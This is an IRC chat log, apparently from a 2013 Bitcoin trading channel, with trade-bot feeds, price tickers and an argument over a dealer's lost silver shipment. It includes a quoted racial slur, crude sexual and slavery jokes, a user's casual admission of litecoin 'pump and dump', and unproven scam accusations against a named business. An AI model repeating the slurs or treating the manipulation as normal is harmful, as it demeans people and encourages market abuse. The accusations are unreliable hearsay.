Mar 06 08:02:10 do you know what's wrong with s.dice price? is this just a dollar based stock? Mar 06 08:02:26 if you read history it's been discussed just hourish ago Mar 06 08:05:12 https://bitcointalk.org/index.php?topic=102181.msg1586172#msg1586172 lmao Mar 06 08:08:14 [BTCTC] [ESECURITYSABTC] 3 @ 0.63494 = 1.9048 BTC [-] Mar 06 08:08:28 "If you're looking for a loan for Bitcoin Poker at Seals, let me know." Mar 06 08:08:36 how does that work ? paid if the op wins only ? Mar 06 08:09:45 "I notice there are some BTC bookies. So I thought I would help bettors win more bets. I began betting on sports back in December 2012 with a nice record so far. " Mar 06 08:09:58 jumpin' jesus on a stick, three months is now a track record ;/ Mar 06 08:11:49 haha check this out https://bitcointalk.org/index.php?topic=149496.msg1587971#msg1587971 the whale emerges. Mar 06 08:12:32 [MPEX] [S.MPOE] 516 @ 0.00073315 = 0.3783 BTC [-] Mar 06 08:12:33 [MPEX] [S.MPOE] 11784 @ 0.00073156 = 8.6207 BTC [-] Mar 06 08:16:55 well -assets, its been an exciting day! Mar 06 08:17:28 :) Mar 06 08:21:03 s.dice has had an interesting ride into divs, and even after... seems to be doing the inverse of what you would expect. Mar 06 08:22:33 nn mod6 Mar 06 08:23:13 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 06 08:23:15 [BTCTC] [BTC-BOND] 98 @ 0.00999 = 0.979 BTC [+] Mar 06 08:23:22 [MPEX] [S.DICE] 100 @ 0.0045 = 0.45 BTC [-] Mar 06 08:23:26 [MPEX] [S.DICE] 100 @ 0.00300002 = 0.3 BTC [-] Mar 06 08:24:35 its amazing the amount of amatures that i come across sometimes, they dont even have a business plan or anything and think they're going to land on an exchange or PT and be taken seriously? Mar 06 08:25:06 got security cams on my house, pretty need seeing my yard from my phone:) Mar 06 08:25:11 neat* Mar 06 08:25:23 lol from your phone even 'eh? Mar 06 08:25:33 BitHub: well, we all have to start somewhere. Mar 06 08:25:46 yeah, had no idea it could do that but hell, same price Mar 06 08:26:01 I know, i'm about 6 months old and i wouldn't even consider doing it yet Mar 06 08:26:19 too many amatures not enough pros, too many bitches, not enough ho's... Mar 06 08:26:24 got 4 rotts to garud the house, neighbors start to fuck with the rotts... so i get video camerias to protect the rotts, fucking crazy Mar 06 08:26:35 i met this guy maybe a month into it? no business plan, its crazy Mar 06 08:26:45 no sales? Mar 06 08:26:50 and i need a truck for the rotts... cuz 4 large dogs are big... but its good cuz the rotts can gaurd the truck... fucking crazy Mar 06 08:26:56 how do you value your company without sales? Mar 06 08:27:04 rotts are supposed to be awesome dogs. Mar 06 08:27:26 they are really good, have 3 females and a male, im breeding them Mar 06 08:27:31 ltc back to 20 cetns lol Mar 06 08:27:39 [MPEX] [O.BTCUSD.C450T] 270 @ 0.17776447 = 47.9964 BTC [+] Mar 06 08:27:41 [MPEX] [S.DICE] 950 @ 0.0046 = 4.37 BTC [+] Mar 06 08:28:03 bid is at .003 for dice ask is .0045? massive spread? Mar 06 08:28:09 too many amatures not enough pros, too many bitches, not enough ho's... << good one Mar 06 08:28:12 it's spelled amateurs tho Mar 06 08:28:24 eek! my bad. Mar 06 08:28:54 i liked that line enough im now digging to find who the fuck came up with it Mar 06 08:28:55 loverance ? Mar 06 08:29:45 its an old ludacris song Mar 06 08:30:20 lol and i mis-remembered how it goes Mar 06 08:30:42 who wants to be coinabul gets scammer tag? https://bitcointalk.org/index.php?topic=149253.20;topicseen Mar 06 08:30:51 they cant send the silver cuz they will lose money Mar 06 08:31:28 "i hate it when its too many niggas, not enough hoes, too many rookies, not enough pros!" Mar 06 08:31:38 [MPEX] [S.DICE] 4 @ 0.0046 = 0.0184 BTC [+] Mar 06 08:31:58 mod6 your mistaken version was better Mar 06 08:32:06 Chaang-Noi he's not getting it what, are you kidding ? Mar 06 08:32:26 lookin for mah man Mircea! Mar 06 08:32:44 he is saying he cant give the silver because he would run out of money Mar 06 08:32:56 he admits the guy paid for it Mar 06 08:33:07 and coinibul fucked up on insurance... Mar 06 08:33:18 coingenuity?! say it aint so!? Mar 06 08:33:28 how can someone who as been in btc land so long be so fucking poor? Mar 06 08:33:33 [MPEX] [S.MPOE] 816 @ 0.00073156 = 0.597 BTC [-] Mar 06 08:33:34 [MPEX] [S.MPOE] 1030 @ 0.00073043 = 0.7523 BTC [-] Mar 06 08:33:35 [MPEX] [S.MPOE] 7259 @ 0.00073042 = 5.3021 BTC [-] Mar 06 08:33:39 what i got from the digest was, customer paid, provider shipped, insurance blew up. Mar 06 08:33:46 why's provider getting a scammer tag again ? Mar 06 08:33:58 fail to insure it correctly Mar 06 08:34:04 what's that mean ? Mar 06 08:34:09 correct insurance was paid for but not recived Mar 06 08:34:39 Mircea, its' peter from eee - you sent me a link to chat with you here. Mar 06 08:34:42 as in, they insured the wrong item ? Mar 06 08:34:42 if i send you a gold bar and tell you it is insured and you pay a fee for that, but it is not insured then its a scam Mar 06 08:34:48 hello eeeCurrencyDotCo Mar 06 08:34:59 Chaang-Noi but it was insured neh ? Mar 06 08:35:06 it seems they did not insure the item in the correct way, coinibul fucked up Mar 06 08:35:17 it was not insured correctly Mar 06 08:35:26 what do you mean correctly ? like they insured the wrong item or soemthing ? Mar 06 08:35:29 if i ship you a gold bar, but insure a taco... its a scam Mar 06 08:35:53 the insureance company said the item was not insured even thought coinibal did pay a fee Mar 06 08:36:04 so how's that on him lol. Mar 06 08:36:04 coinibul did not read the fine print Mar 06 08:36:17 :) (hi everybody) - I'm here for a specific reason, but I saw someone mention insurance. is there someone offering insurance on btc? I had ben contemplating getting my US license to offer to be an insurance broker and perhaps do somethng Mar 06 08:36:25 if you give me a hundred bucks to give to mod6 for towing your car Mar 06 08:36:29 and i give him 100 but he doesn't tow your car Mar 06 08:36:34 well.., talk to mod6 Mar 06 08:36:35 if i send you a car from thailand and insure it, but fine print says we dont insure cars whos fault is it? Mar 06 08:36:55 haha that's ridiculous. so are they dropping that insurer now ? Mar 06 08:37:03 but mp i paid you a preiumuim to do the insurance for me... Mar 06 08:37:19 yes mp they did a differnt insurance company cuz turned out they did not have insurance Mar 06 08:37:24 they moved Mar 06 08:37:34 i would guess yah, just change insuance co's and that should set it right. Mar 06 08:37:38 but coinibul still fucked up, the buyer is not at fault here Mar 06 08:37:52 well, one guy is out of 80 btc worht of silver Mar 06 08:37:53 well for all you know buyer got the silver Mar 06 08:37:55 isn't the liability on the person with the implied or definitive contract? Mar 06 08:38:02 i mean, these word against word things are difficult to break up Mar 06 08:38:07 package never arived Mar 06 08:38:10 yeah :/ Mar 06 08:38:13 Chaang-Noi so the guy says Mar 06 08:38:16 they have tracking to priove buyer never got package Mar 06 08:38:18 other guy says package was sent Mar 06 08:38:23 coinibul posted tracking number Mar 06 08:38:25 um Mar 06 08:38:28 if you contract with person a and bring person b in to it, isnt the contract with person a, not b? Mar 06 08:38:30 conibul said it got lost in customs Mar 06 08:38:31 so then wait. if package never arrived it's the post ? Mar 06 08:38:44 post or customs stole it, yeah Mar 06 08:38:47 ah it's one of those Mar 06 08:38:51 ya those never end up well. Mar 06 08:39:01 still. customs should get the tag. Mar 06 08:39:01 so buy was like wtf, i want silver Mar 06 08:39:11 the coinibul was like sorry, silver not insured, fuck off Mar 06 08:39:21 nobody insures against customs confiscations. Mar 06 08:39:22 ups just delivered a package today and left it with no sig - who should replace the loss? ups or the shipper? Mar 06 08:39:55 if there is insurance they need to cover it, but if it was sold as insured and not insured its a fucking scam Mar 06 08:39:56 i guess this is why i am not in the business of delivering bullion to the retail postage market. Mar 06 08:40:07 sucks for margins, sucks for operations, sucks all around. Mar 06 08:40:11 yeah... reading fine print help... Mar 06 08:40:14 yep Mar 06 08:40:34 but jesus he willl destroy his rep for 80 btc saying he has no money to give the guy silver,,, how can he be so poor and be in btc that long... Mar 06 08:40:43 need in house vaults Mar 06 08:40:44 well, who knows dude. Mar 06 08:40:47 Chaang-Noi it's liability management Mar 06 08:40:56 if he does this then he's going to have a rash of people trying it. Mar 06 08:41:09 don't underestimate the interwebs slave culture. Mar 06 08:41:10 the buyer has proof he never got the shit... Mar 06 08:41:15 people will do incredible things for pennies. Mar 06 08:41:28 i hope coinabul works it out :) seems like a good kind Mar 06 08:41:32 the buyer could not have scammed here Mar 06 08:41:42 i ordered from coinibul myself once, ill never do it again... Mar 06 08:41:56 but you two are like broooos Mar 06 08:42:01 and that was cuz he fucked my order up, not this Mar 06 08:42:44 [MPEX] [S.DICE] 100 @ 0.0045 = 0.45 BTC [-] Mar 06 08:42:46 [MPEX] [S.DICE] 100 @ 0.0035 = 0.35 BTC [-] Mar 06 08:42:47 Mircea, when is a good time to come back and chat with you about setting up an exchange, or becoming a broker, or getting listed? Mar 06 08:42:52 well, personally, i think its a cool business (many others think its pretty neat-o too), I hope he gets it squared away. Mar 06 08:43:54 eeeCurrencyDotCo now is fine Mar 06 08:44:13 you go /query mircea_popescu to talk in private. Mar 06 08:44:21 aww Mar 06 08:44:26 Thanks Mar 06 08:44:49 lol is that the mtgox 1satoshi bot pushing the s.dice down ? Mar 06 08:46:06 Hey, at least there's some action! Mar 06 08:48:30 http://polimedia.us/dtng/c/src/136255249324.png "plz to insert buttcoinz" Mar 06 08:48:59 [MPEX] [S.DICE] 1 @ 0.0046 BTC [+] Mar 06 08:49:25 mornin Mar 06 08:49:53 what, you slept ?! Mar 06 08:50:03 myeah Mar 06 08:50:06 it sucks! Mar 06 08:50:24 [MPEX] [S.DICE] 100 @ 0.0045 = 0.45 BTC [-] Mar 06 08:51:23 [MPEX] [S.DICE] 1 @ 0.0046 BTC [+] Mar 06 08:53:33 so runup to 45, retrace to 44, back for another go Mar 06 08:54:00 ;;stats Mar 06 08:54:01 I have 16 registered users with 21 registered hostmasks; 1 owner and 0 admins. Mar 06 08:54:05 no that u silly Mar 06 08:54:07 ;;bc,stats Mar 06 08:54:10 Current Blocks: 224491 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1300 blocks | Next Difficulty In About: 1 week, 1 day, 21 hours, 41 minutes, and 55 seconds | Next Difficulty Estimate: 4775657.49997 | Estimated Percent Change: 9.33592 Mar 06 08:54:15 ;;ticker Mar 06 08:54:18 ;;bc,convert eur Mar 06 08:54:19 BTCUSD ticker | Best bid: 44.34351, Best ask: 44.68217, Bid-ask spread: 0.33866, Last trade: 44.68217, 24 hour volume: 105246.62244956, 24 hour low: 37.72771, 24 hour high: 45.00000, 24 hour vwap: 40.78103 Mar 06 08:54:20 16 users, that little ?>! Mar 06 08:54:20 1 BTC = 44.68217 U.S. dollars = 34.1999005 Euros Mar 06 08:54:37 damn. Mar 06 08:54:45 kakobrekla recall what you said about btc ? Mar 06 08:54:50 YOU WERE WRONG. it's not 32, its 34. Mar 06 08:55:04 dunn o said a lot of stuff Mar 06 08:55:34 ah ah Mar 06 08:55:37 :p Mar 06 08:55:40 :DD Mar 06 08:55:48 i said 33 then. Mar 06 08:55:55 close eh? Mar 06 08:55:57 yeah lol Mar 06 08:56:08 you should start a subscrtiption service. Mar 06 08:56:12 hahah Mar 06 08:56:30 "i'ma go take a piss. by the time im back, btc is 1 ford escort per" Mar 06 08:56:38 :DDDDDD Mar 06 08:56:48 then it turns true and everyone is "buy kakobrekla escorts" Mar 06 08:56:51 "and i havent pissed in a long while" Mar 06 08:57:06 lol Mar 06 09:03:59 <[\\\]> so when's the correction? Mar 06 09:04:14 you mean the 100$? Mar 06 09:04:16 after 125 Mar 06 09:04:17 need to wait a bit more Mar 06 09:04:30 [\\\] the way my book is loaded if we go back to 30 im'a be floating in a pond of btc Mar 06 09:06:36 fuuuuck 45.77 Mar 06 09:06:45 ;;ticker Mar 06 09:06:45 BTCUSD ticker | Best bid: 44.50000, Best ask: 44.70000, Bid-ask spread: 0.20000, Last trade: 45.77190, 24 hour volume: 105273.67523350, 24 hour low: 38.48373, 24 hour high: 45.77190, 24 hour vwap: 40.95523 Mar 06 09:07:02 lo wat? Mar 06 09:07:15 no, its hi wat. Mar 06 09:07:16 ;;ticker Mar 06 09:07:16 BTCUSD ticker | Best bid: 44.50000, Best ask: 44.56634, Bid-ask spread: 0.06634, Last trade: 44.56634, 24 hour volume: 105176.47600550, 24 hour low: 38.48373, 24 hour high: 45.77190, 24 hour vwap: 40.95719 Mar 06 09:07:46 amphipod> Mar06 07:05:44 mtgox x221 1,000.0000 @ 4,319.05105821 JPY Mar 06 09:07:50 it was in yen Mar 06 09:07:53 lol fuck Mar 06 09:08:11 lol Mar 06 09:08:21 ;;ticker yen Mar 06 09:08:21 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 06 09:08:42 ;;ticker JPY Mar 06 09:08:42 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 06 09:08:55 ;;ticker --JPY Mar 06 09:08:55 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 06 09:09:13 ;;ticker --currency JPY Mar 06 09:09:13 BTCJPY ticker | Best bid: 4200.899, Best ask: 4292.351, Bid-ask spread: 91.45200, Last trade: 4371.772, 24 hour volume: 5026.74060167, 24 hour low: 3531.751, 24 hour high: 4371.772, 24 hour vwap: 4236.634 Mar 06 09:14:04 did i just see that right? Mar 06 09:14:07 nearly hit 46 Mar 06 09:14:08 ;;ticker Mar 06 09:14:09 BTCUSD ticker | Best bid: 44.60001, Best ask: 44.94191, Bid-ask spread: 0.34190, Last trade: 44.51434, 24 hour volume: 105828.92739695, 24 hour low: 38.48373, 24 hour high: 45.98000, 24 hour vwap: 41.05239 Mar 06 09:14:16 in yen not usd Mar 06 09:14:37 ;;asks 46 Mar 06 09:14:37 There are currently 573.51808 bitcoins offered at or under 46.0 USD, worth 26378.2569228 USD in total. | Data vintage: 69.3444 seconds Mar 06 09:14:44 it looks to me like mt gox is bidding this shit up... Mar 06 09:14:46 o thats why Mar 06 09:14:59 just only 573 to 46 USD Mar 06 09:15:03 [HAVELOCK] [SDICE] 1 @ 0.50000001 BTC [+] Mar 06 09:15:05 [HAVELOCK] [SDICE] 20 @ 0.5 = 10 BTC [-] Mar 06 09:15:10 <[\\\]> You know, I'm surprised people don't bring that up more Mar 06 09:15:21 <[\\\]> mtgox has a vested interest in having the price of bitcoin go up Mar 06 09:15:21 Chaang-Noi: yeah Mar 06 09:15:23 no one cares Mar 06 09:15:27 <[\\\]> since they charge half their fees in btc Mar 06 09:15:33 [BTCTC] [B.YABMC] 1 @ 0.00667 BTC [+] Mar 06 09:15:35 [BTCTC] [B.YABMC] 54 @ 0.00666 = 0.3596 BTC [-] Mar 06 09:15:37 [BTCTC] [B.YABMC] 19 @ 0.0066 = 0.1254 BTC [-] Mar 06 09:15:46 went from 12 to 45, now the public is buying... i dont give a fuck if it is gox or not, but i bet it is partly them... Mar 06 09:15:58 [\\\], depends on your settings Mar 06 09:16:13 you know the gox people are old timers who have a shit load of btc... lose some fiat, make massive gain in btc... Mar 06 09:16:22 i do that in ltc at time... pump and dump Mar 06 09:16:23 [\\\] everyone does, tho. Mar 06 09:16:50 the thing with btc is that it's useful worth 1 unit at a market cap < 1bn, and worth significantly more than 10 units at a market cap > 10bn Mar 06 09:17:50 <[\\\]> kakobrekla, what do you mean? Mar 06 09:18:07 [\\\] you can set it so fees are taken from fiat side only Mar 06 09:18:24 <[\\\]> yeah, but you still pay the same amount Mar 06 09:18:31 in dollars Mar 06 09:18:36 <[\\\]> they just take the equivalent amount in USD Mar 06 09:18:36 or whatever Mar 06 09:18:40 i quit? Mar 06 09:18:44 <[\\\]> it is still the same fee Mar 06 09:18:46 so it doesnt matter if btc goes up for them Mar 06 09:18:51 if they have ur dollars Mar 06 09:19:18 <[\\\]> taking a fee of .5% of a $30 btc vs a $5 btc Mar 06 09:19:42 if i have 1,000,000 btc and it costs me 1,000,000 fiat to move the price from $15 to $30 then i spend 1 million to get 15 million... Mar 06 09:19:49 ya but its 30 000 usd not 5 000 usd Mar 06 09:20:05 <[\\\]> that isn't a yeah but Mar 06 09:20:07 <[\\\]> you're making my point Mar 06 09:20:27 you are moving more fiat Mar 06 09:20:30 ofc there will be more fee Mar 06 09:20:32 <[\\\]> regardless of how you express it, they're getting more USD Mar 06 09:20:33 halooo Mar 06 09:21:04 <[\\\]> they're still moving the same amount of btc, why should the fee go up? ;) Mar 06 09:21:47 casuse its more dwollars Mar 06 09:22:23 Mar06 07:21:21 mtgox x62 414.2822 @ 45.90051627 USD Mar 06 09:22:23 Mar06 07:21:21 mtgox x66 532.4452 @ 4,387.21444939 JPY Mar 06 09:23:29 946... maybe out of money? Mar 06 09:23:40 [BTCTC] [S.DICE-PT] 8 @ 0.00568 = 0.0454 BTC [-] Mar 06 09:23:45 ;;ticker Mar 06 09:23:45 BTCUSD ticker | Best bid: 45.44733, Best ask: 45.68716, Bid-ask spread: 0.23983, Last trade: 45.44733, 24 hour volume: 106156.27636265, 24 hour low: 38.48373, 24 hour high: 46.40000, 24 hour vwap: 41.11371 Mar 06 09:24:18 ;;bc,convert eur Mar 06 09:24:19 1 BTC = 45.68716 U.S. dollars = 34.8251848 Euros Mar 06 09:25:47 46 lol almost Mar 06 09:25:49 ;;ticker Mar 06 09:25:49 BTCUSD ticker | Best bid: 45.67000, Best ask: 45.98000, Bid-ask spread: 0.31000, Last trade: 45.98000, 24 hour volume: 106101.67272176, 24 hour low: 38.48373, 24 hour high: 46.40000, 24 hour vwap: 41.12159 Mar 06 09:26:05 oh shit we killed 46 already Mar 06 09:26:12 <[\\\]> red bold text makes for easy reading: https://bitcointalk.org/index.php?topic=75802.msg1589202#msg1589202 Mar 06 09:26:34 noway Mar 06 09:26:35 ;;ticker Mar 06 09:26:36 BTCUSD ticker | Best bid: 45.67000, Best ask: 45.98000, Bid-ask spread: 0.31000, Last trade: 45.98000, 24 hour volume: 106146.37381511, 24 hour low: 38.48373, 24 hour high: 46.40000, 24 hour vwap: 41.12535 Mar 06 09:26:53 dude this needs to simmer down Mar 06 09:27:00 i need to go shower, get laid, do human stuff Mar 06 09:27:10 i can't be spending my days watching the screens ;/ Mar 06 09:27:25 yeah i hear ya... girls dont like giving bjs when you look at charts... Mar 06 09:29:02 theymos has some tricky shit dealing with glbse and scammer tags Mar 06 09:29:23 he has to be careful or he will need to give him self a few lol Mar 06 09:30:33 girls don't mind, that's what slavery was invented for. Mar 06 09:30:35 however, i mind. Mar 06 09:30:59 i at this time do not have a slave. Mar 06 09:32:58 [MPEX] [S.DICE] 1 @ 0.004 BTC [-] Mar 06 09:32:59 [MPEX] [S.DICE] 99 @ 0.0035 = 0.3465 BTC [-] Mar 06 09:34:03 ;;asks 50 Mar 06 09:34:09 There are currently 11272.36 bitcoins offered at or under 50.0 USD, worth 542707.482662 USD in total. | Data vintage: 0.0017 seconds Mar 06 09:34:33 at this rate we will be at $50 this time tomorrow Mar 06 09:36:04 oh shit, just found 5000 ltc i forgot about Mar 06 09:44:08 ;;ticker Mar 06 09:44:09 BTCUSD ticker | Best bid: 46.00100, Best ask: 46.41402, Bid-ask spread: 0.41302, Last trade: 46.00000, 24 hour volume: 107455.02852074, 24 hour low: 38.48373, 24 hour high: 46.49000, 24 hour vwap: 41.24338 Mar 06 09:45:45 bwuahahaha Mar 06 09:46:26 :) Mar 06 09:46:30 ltc over 20 cetns too Mar 06 09:46:58 So that's a $1000 you just found Mar 06 09:47:25 i was checking old wallets Mar 06 09:47:39 i knew where it was, but i forgot it had coin in it Mar 06 09:47:48 thought id check cuz new hights... Mar 06 09:50:50 [BTCTC] [GSDPT] 10 @ 0.005401 = 0.054 BTC [-] Mar 06 09:51:00 [BTCTC] [GSDPT] 3 @ 0.0054 = 0.0162 BTC [-] Mar 06 09:51:21 [BTCTC] [S.DICE-PT] 25 @ 0.00502 = 0.1255 BTC [-] Mar 06 09:51:37 [BTCTC] [GSDPT] 100 @ 0.0053 = 0.53 BTC [-] Mar 06 09:51:50 [BTCTC] [GSDPT] 92 @ 0.005 = 0.46 BTC [-] Mar 06 09:54:48 dice trades for .0035 on exchange pt is .0054? lol Mar 06 09:59:05 [BTCTC] [ASICMINER-PT] 84 @ 0.65 = 54.6 BTC [-] Mar 06 10:01:07 PTs lag behind a bit. Mar 06 10:04:38 Mar06 07:48:37 bitfloor 6.3606 @ 48.49 USD Mar 06 10:04:46 seems bullish Mar 06 10:07:04 [HAVELOCK] [SDICE] 1 @ 0.46 BTC [-] Mar 06 10:12:03 [HAVELOCK] [SDICE] 5 @ 0.44 = 2.2 BTC [-] Mar 06 10:12:05 [HAVELOCK] [SDICE] 5 @ 0.43 = 2.15 BTC [-] Mar 06 10:12:06 [HAVELOCK] [SDICE] 2 @ 0.425 = 0.85 BTC [-] Mar 06 10:12:07 [HAVELOCK] [SDICE] 5 @ 0.42 = 2.1 BTC [-] Mar 06 10:13:39 S.DICE on the other hand is going down the drain Mar 06 10:14:04 [HAVELOCK] [KCIM] 2 @ 0.955 = 1.91 BTC [-] Mar 06 10:15:52 never thought it would last, shocked it did as well as it has Mar 06 10:16:04 [HAVELOCK] [SDICE] 5 @ 0.41 = 2.05 BTC [-] Mar 06 10:16:07 sooo i just realised Mar 06 10:16:17 mpoe bot traded ~30k calls today, + 10k or so puts Mar 06 10:16:28 this is like a good fraction of mtgox's day. Mar 06 10:16:46 seems people are bullish eh? Mar 06 10:16:52 way. Mar 06 10:16:54 ;;ticker Mar 06 10:16:55 BTCUSD ticker | Best bid: 46.20199, Best ask: 46.83966, Bid-ask spread: 0.63767, Last trade: 46.90000, 24 hour volume: 108408.53715162, 24 hour low: 38.48373, 24 hour high: 46.93000, 24 hour vwap: 41.38489 Mar 06 10:17:03 [HAVELOCK] [SDICE] 10 @ 0.4 = 4 BTC [-] Mar 06 10:17:08 apparently with good reason. Mar 06 10:17:31 yeah... its smart to buy up all the calls, then dump 10 million on gox.... Mar 06 10:17:45 Chaang-Noi: not at all Mar 06 10:17:52 get tones of shit, sell back 10 million btc, at the much higher price, and do it again Mar 06 10:17:55 free money Mar 06 10:18:03 Chaang-Noi: i explained that it's the insurance company's choice to insure any parcel... Mar 06 10:18:19 :P Mar 06 10:18:25 man he never got his silver, you never gave it to him, end of stopry Mar 06 10:18:34 incorrect 100% Mar 06 10:18:39 he got the silver/ Mar 06 10:18:39 ? Mar 06 10:18:51 you need to post in the thread if he got the silver man... Mar 06 10:18:55 he was given his silver, his country's goverment stole it, i was going to replace it until he wrote a script to annoy me Mar 06 10:19:01 end of story Mar 06 10:19:09 anyway, i can't talk with you, i'm eating dinner Mar 06 10:19:13 you failed to get him the silver Mar 06 10:19:30 your going to get killed in that thread man, just man up and pay it back Mar 06 10:21:18 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.18460872 = 184.6087 BTC [+] Mar 06 10:21:21 Doesn't coinabul specify the user must research import laws for his country himself? If the silver/gold is seized at the customs, no coinabul's problem. Mar 06 10:22:04 Namworld: yes, we do Mar 06 10:22:52 customs clearly will claim there was no silver... (as they stole it) its not like shipping to Austriala is illegal Mar 06 10:23:01 Namworld: aside from insuring, and paying premiums on said insurance, for all parcels who's owners request it, we cannot do anything to change the minds of insurance companies nor governments... Mar 06 10:23:12 (although we always do our best to try) Mar 06 10:23:40 you need to say on your website insured shipping does not imp[ly the shipping is insured and delivery is not guarranteed Mar 06 10:23:53 also 47... almost Mar 06 10:24:03 ;;asks 47 Mar 06 10:24:06 There are currently 3915.0774 bitcoins offered at or under 47.0 USD, worth 183856.80088 USD in total. | Data vintage: 0.0031 seconds Mar 06 10:24:13 ahh nice wall on 47 Mar 06 10:24:17 Chaang-Noi: i'm going to ignore your instigation, insured shipping is insured Mar 06 10:24:28 i have more important work to do than bicker about nothing with you Mar 06 10:24:35 you came here buddy Mar 06 10:24:39 best of luck Mar 06 10:25:05 Chaang-Noi: come back to me when you've contributed anything more than trolling to the bitcoin community as a whole... Mar 06 10:25:10 anyway, /ignore Mar 06 10:26:05 oh slam, a scammer called me a troll, buuuurn :) Mar 06 10:27:01 Chaang-Noi: i'm almost certain you've 1. ordered gold from me 2. had that gold delivered to you successfully Mar 06 10:27:08 so yeah, really? Mar 06 10:27:16 yeah it took a month Mar 06 10:27:34 i felt cheated i needed it right away, Mar 06 10:27:48 you did not steal from me, but id never use you again... Mar 06 10:28:03 however i need that gold to sell for fiat and you fucked me over by taking forever Mar 06 10:28:10 and i lost a lot of value while waiting Mar 06 10:28:26 dont have have me on ignore? im going afk anyway Mar 06 10:28:38 46.9 new ath, Mar 06 10:29:02 that small wall at 47 should slow us down a bit Mar 06 10:30:58 ;;asks 47 Mar 06 10:31:03 There are currently 2982.5833 bitcoins offered at or under 47.0 USD, worth 140147.42823 USD in total. | Data vintage: 0.0011 seconds Mar 06 10:32:33 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.18488932 = 184.8893 BTC [+] Mar 06 10:39:58 ;;asks 47 Mar 06 10:40:05 There are currently 3728.5372 bitcoins offered at or under 47.0 USD, worth 175132.256038 USD in total. | Data vintage: 0.0012 seconds Mar 06 10:45:44 [BTCTC] [B.YABMC] 5 @ 0.0066 = 0.033 BTC [-] Mar 06 10:46:19 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.18548653 = 185.4865 BTC [+] Mar 06 10:52:34 [BTCTC] [COGNITIVE] 4 @ 0.27 = 1.08 BTC [-] Mar 06 10:53:03 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.18619661 = 186.1966 BTC [+] Mar 06 10:53:53 ;;ticker Mar 06 10:53:54 BTCUSD ticker | Best bid: 46.06200, Best ask: 46.10000, Bid-ask spread: 0.03800, Last trade: 46.10000, 24 hour volume: 109292.22019850, 24 hour low: 38.48373, 24 hour high: 46.93000, 24 hour vwap: 41.61645 Mar 06 10:54:07 !ticker m ^oix Mar 06 10:54:09 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 47.44997453 / 50.14846327 (no shares, 13,996.17 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 10:54:20 over 50. this is historix. Mar 06 10:59:10 ;;tslb Mar 06 10:59:37 Time since last block: 9 minutes and 32 seconds Mar 06 11:04:26 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.18991695 = 189.917 BTC [+] Mar 06 11:06:53 http://bitbet.us/bet/291/bitcoin-over-50-by-march-13th/ Mar 06 11:07:07 put a bitcoin in teh oix! Mar 06 11:23:10 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.190908 = 190.908 BTC [+] Mar 06 11:29:00 ouch dice is dead Mar 06 11:31:06 nah Mar 06 11:31:14 some will pull out, sell the coin Mar 06 11:31:22 other people will buy the coins and put it back in Mar 06 11:31:27 just a shuffle Mar 06 11:32:44 has $45 really come and gone today Mar 06 11:33:16 i sold 100 for my father for 4670 Mar 06 11:34:09 i am trying to buy a few :P Mar 06 11:34:34 only 42 on BTC-e just hard to get USD there Mar 06 11:35:02 hard to get them there fast at least Mar 06 11:35:36 well i did get em for 45 Mar 06 11:38:43 ZedsterX, you can always just long it Mar 06 11:41:29 ;;goxlag Mar 06 11:41:46 245.37453 seconds Mar 06 11:41:51 lol Mar 06 11:42:08 it was 600 earlier Mar 06 11:42:35 no hardware can make up for bad code Mar 06 11:42:36 its retarded, pretty much random whether your order hits Mar 06 11:43:48 yes gox is retarded Mar 06 11:43:52 also stamp is retarded Mar 06 11:43:59 but just a little less Mar 06 11:44:08 or maybe even not that Mar 06 11:44:25 just the money is out quicker there Mar 06 11:44:38 sill no solid platform to trade btc Mar 06 11:44:53 [BTCTC] [S.DICE-PT] 1 @ 0.00548 BTC [+] Mar 06 11:45:56 [BTCTC] [S.DICE-PT] 191 @ 0.00548 = 1.0467 BTC [+] Mar 06 11:46:34 market buy around 43.9 buys at 44.50 Mar 06 11:46:52 [BTCTC] [ESECURITYSABTC] 1 @ 0.63494 BTC [-] Mar 06 11:53:10 woha Mar 06 11:53:17 sdiec bid is at IPO prices Mar 06 11:54:17 yet people are still buying it for 0.0052 on bf Mar 06 12:00:16 keep putting up bids on BF please Mar 06 12:06:19 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 06 12:10:04 [HAVELOCK] [SDICE] 2 @ 0.42 = 0.84 BTC [+] Mar 06 12:14:58 meow Mar 06 12:15:02 ;;ticker Mar 06 12:15:10 BTCUSD ticker | Best bid: 46.14403, Best ask: 46.47898, Bid-ask spread: 0.33495, Last trade: 46.14403, 24 hour volume: 105262.95331360, 24 hour low: 39.00000, 24 hour high: 46.93000, 24 hour vwap: 42.31133 Mar 06 12:15:28 holy titfuck Mar 06 12:15:45 morning! Mar 06 12:15:58 expect $50 tommorow when you wake up. Mar 06 12:17:55 mpex down or just me? Mar 06 12:18:27 it looks down to me Mar 06 12:18:37 hmm yea so does downforeveryoneorjustme.com Mar 06 12:18:54 must be a recent thing it was working not too long ago Mar 06 12:20:03 [BTCTC] [ASICMINER-PT] 50 @ 0.65 = 32.5 BTC [-] Mar 06 12:20:41 [BTCTC] [BTC-BOND] 25 @ 0.00999 = 0.2498 BTC [+] Mar 06 12:21:05 try http://mpex.coinbr.com/ Mar 06 12:21:15 oh god Mar 06 12:21:27 guys I 